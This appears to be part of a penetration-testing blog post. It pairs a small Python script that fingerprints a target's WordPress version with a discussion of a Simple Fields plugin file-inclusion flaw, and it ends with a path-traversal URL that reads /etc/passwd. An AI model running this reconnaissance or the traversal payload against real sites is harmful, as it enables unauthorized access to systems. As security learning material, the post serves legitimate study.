#!/usr/bin/python
import urllib2
print "[*] Target URL format = http://www.mydomain.com"
host = raw_input("[*] Enter target URL: ")
path = '/wp-links-opml.php'
combined = host + path
url = urllib2.urlopen(combined)
print
print ("fetching... ") + combined
html = url.readlines()
for line in html:
if 'generator' in line:
print
print line

I came across a web site running a current version of WordPress with the Simple Fields plugin installed.  Searching Exploit-DB, I found:

WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution

“ This can even lead to remote code execution, for example by injecting php code into the apache logs or if allow_url_include is turned on in php.ini. ”

The first time you find a page with a Local File Inclusion (LFI) vulnerability, it's like magic.  You feed your string in the browser:

http://192.168.150.150/vulnerable.php?page=../../../../../../../../etc/passwd%00

... it spits back the contents of /etc/passwd, you're excited, and you continue enumerating the system.